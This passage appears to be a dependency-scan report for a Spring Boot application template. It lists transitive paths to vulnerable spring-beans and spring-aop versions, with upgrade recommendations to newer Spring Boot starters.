  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
